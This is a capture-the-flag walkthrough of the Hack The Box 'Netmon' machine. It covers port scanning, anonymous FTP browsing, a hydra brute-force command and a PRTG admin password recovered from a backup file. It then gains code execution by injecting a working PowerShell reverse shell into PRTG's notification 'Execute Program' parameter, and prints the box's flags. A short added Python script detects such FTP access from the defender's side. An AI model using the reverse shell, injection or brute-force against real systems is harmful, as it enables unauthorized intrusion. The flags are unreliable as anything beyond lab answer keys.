Netmon

Easy box from HTB; quite frankly, the user flag could have been hidden a bit more. Enumerating the server to obtain the .bak files was quite a challenge. The RCE at the end was basic.

Learning:

  • Enumeration on FTP

  • Credential Hunt

  • Executing RCE manually or using msfconsole

Enumeration

nmap 10.129.230.176        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 13:06 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.029s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Check FTP:

nmap 10.129.230.176 -p 21 -A
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 13:08 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT

user.txt can be found under the Public user's directory when you navigate through the FTP share.

cat user.txt
6cf59125ff605c57eb6dc38a3b9cfce5

Enumerating FTP to obtain user credentials:

  • Goal: attempt to find old .bak files

  • Find old config files

Users:

netmon\administrator

Brute-force attempt (did not work):

hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.230.176 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^&loginurl=:Your login has failed"

Navigating the FTP share again, looking for credentials:

cd "Program Files (x86)\PRTG Network Monitor\"
# Nothing noteworthy in that directory

cd "Program Files (x86)\Windows"
# From Program Files we are heading to Windows
02-25-19  09:54PM              1189697 PRTG Configuration.dat

Note: user common UID 100

Old .bak files, obtained from:
/ProgramData/Paessler/PRTG Network Monitor

Get PRTG Configuration.old.bak

User Credential Found:

User: prtgadmin
Pass: PrTg@dmin2019
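As an added defender-side example (not from the original writeup), the anonymous login and the retrieval of the .bak configuration file above are exactly the events an FTP server log would record. This Python script parses constructed IIS-style W3C FTP log lines (field layout assumed; the #Fields header is honoured) and flags anonymous sessions that touch backup or configuration paths:

```python
# Constructed sample in the W3C extended format IIS FTP writes. The field
# order is an assumption; the "#Fields:" header is parsed, so a log with a
# different layout still works as long as the same field names are present.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2025-01-25 02:06:11 10.10.14.33 - USER anonymous 331
2025-01-25 02:06:11 10.10.14.33 anonymous PASS *** 230
2025-01-25 02:06:20 10.10.14.33 anonymous RETR /Users/Public/user.txt 226
2025-01-25 02:09:02 10.10.14.33 anonymous CWD /ProgramData/Paessler/PRTG+Network+Monitor 250
2025-01-25 02:09:10 10.10.14.33 anonymous RETR /ProgramData/Paessler/PRTG+Network+Monitor/PRTG+Configuration.old.bak 226
2025-01-25 02:15:44 10.10.14.50 svc_backup RETR /Backups/db.bak 226
"""

# Paths and file types an anonymous FTP user has no business touching.
SENSITIVE_PREFIXES = ("/programdata", "/windows", "/inetpub", "/program files")
SENSITIVE_SUFFIXES = (".bak", ".old", ".dat", ".config", ".conf")

def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records

def anonymous_logins(records):
    """Client IPs that completed an anonymous login (PASS answered with 230)."""
    return {r["c-ip"] for r in records
            if r["cs-username"].lower() == "anonymous"
            and r["cs-method"] == "PASS" and r["sc-status"] == "230"}

def sensitive_anonymous_access(records):
    """Successful (2xx) anonymous commands against sensitive paths or file types."""
    hits = []
    for r in records:
        path = r["cs-uri-stem"].replace("+", " ").lower()  # IIS encodes spaces as '+'
        if (r["cs-username"].lower() == "anonymous" and r["sc-status"].startswith("2")
                and (path.startswith(SENSITIVE_PREFIXES) or path.endswith(SENSITIVE_SUFFIXES))):
            hits.append((r["c-ip"], r["cs-method"], r["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    print("anonymous logins from:", sorted(anonymous_logins(recs)))
    for ip, method, path in sensitive_anonymous_access(recs):
        print(f"ALERT {ip} {method} {path}")
```

The Public user.txt download is deliberately not flagged, while the CWD into ProgramData and the .old.bak retrieval are; the authenticated svc_backup transfer is left alone.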

RCE

Shell attempt with the Metasploit module windows/http/prtg_authenticated_rce:
the host is vulnerable to this authenticated RCE.

Another way of obtaining RCE:

In the PRTG Admin Panel head to:

  • Setup

  • Account Settings

  • Notifications

  • Inside the Notification setting head to Execute Program

  • Execute Program setting

  • In the Parameter field, input the reverse shell:

tes.txt;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.33',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  • Make sure you select Demo exe notification - outfile.ps1 in the Program File parameter

  • Save

  • Create a netcat listener: `nc -lvnp 1234`

  • Once saved, head to Notifications

  • Click the notification we created (named pwn)

    • On the far right-hand side you will see a small box with a pen; click that

    • Click the bell (hovering over it shows "Send notification")

    • RCE done!

  • Follow the block dots if lost

Popped it.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
9282597bae369ff9a75033e99ddc5bcd
